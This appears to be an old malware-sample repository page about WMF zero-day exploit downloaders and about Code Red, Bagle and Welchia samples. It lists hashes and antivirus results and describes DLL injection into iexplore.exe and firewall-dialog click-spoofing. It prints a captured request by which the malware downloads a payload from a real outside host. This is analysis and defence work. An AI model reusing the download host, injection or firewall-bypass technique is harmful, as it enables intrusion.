Thanks to seville we have more wmf stuff. These go out to a site and download a new file.
Heres some pretty pictures:
So sdbot05b.jpg gets turned into command.pif GET /sdbot05b.jpg HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: charmedmadgic.free.fr Connection: Keep-Alive HTTP/1.1 200 OK Date: Mon, 02 Jan 2006 05:24:45 GMT
These files compose downloader from the original WMF exploit posted on bugtraq. It is composed of two parts:
bumXXX.exe md5sum: FE3B1E317846E0F398AF27954DD09C93
tioXXX.dll md5sum: 2AE5ED3EDD6925D6117548CF1E9F3C52
tioXXX.dll is dropped by bumXXX.exe and used for DLL injection into spawned iexplore.exe for downloading additional components. It also tries to bypass firewalls by sending WM_LBUTTONDOWN/WM_LBUTTONUP messages to firewall confirmation dialog.
Also bumXXX.exe is packed with PE Compact, i just ran it and dumped it's memory image, and fixed IAT manually, the only PE Compact unpacker I found didn't work :/
NEW: I recommend reading this site for more defense information.
This thing is really really nasty. I completely destroyed a computer trying to analyse it and am almost done rebuilding it :) Luckily I keep my analysis computers segragated, and you should too!
These files were obtained at CastleCops.com and contain all of the related files of the Zero-day IE .wmf exploit. Haven't had time for analysis yet.
Included is a.exe, kl.exe, loaderadv562.exe, ms1.exe, paytime.exe, tool 1 through 5.exe, toolbar.exe, and
NEW: added more related files contributed by seville THANKS!
Scanning -> C:\malware\wmf\vscan\xpl.wmf
[-] File is NON executable..(non MZ)
- Scan Took : 0.0 Seconds
AntiVir Found Trojan/Dldr.WMF.Agent.D
ArcaVir Found nothing
Avast Found Win32:Exdown
AVG Antivirus Found nothing
BitDefender Found Exploit.Win32.WMF-PFV.C
ClamAV Found Exploit.WMF.A
Dr.Web Found Exploit.MS05-053
F-Prot Antivirus Found security risk or a "backdoor" program
Fortinet Found W32/WMF-exploit
Kaspersky Anti-Virus Found Trojan-Downloader.Win32.Agent.acd
exe sha1sum: 4605a2d0aae8fa5ec0b72973bea928762cc6d002 win_codred_a.exe
exe md5sum: 6f5767ec5a9cc6f7d195dde3c3939120 *win_codred_a.exe
zip md5sum: 55f9524bbbed7f8ae0850ed01562090b *win_codred_a.zip
info: 4039 Jul 16 2001 win_codred_a.exe
Update: I attached idb that was provided by eEye research team. The idb is fully commented.
exe sha1sum: be4f2b7ca634ce946317acdc54b1423e2f5329ce win_bagle_ai.exe
zip md5sum: 23d344f3b2e5f4dfaa1bdbd56ee39b02 *win_bagle_ai.zip
exe md5sum: 239644e31ce940a25a8ca907feba0d19 *win_bagle_ai.exe
info: 24010 Jul 20 2004
sha1sum: bdc843c65e6984b35dd26c53e84338ff3982da2d win_welchia.exe
md5sum: 24837f736517f367a11dcb8bd8ed6306 *win_welchia.exe
info: 12800 Feb 13 2005 win_welchia.exe
zip md5sum: 3913187407b74597753f324bb9818ba5 *win_welchia.zip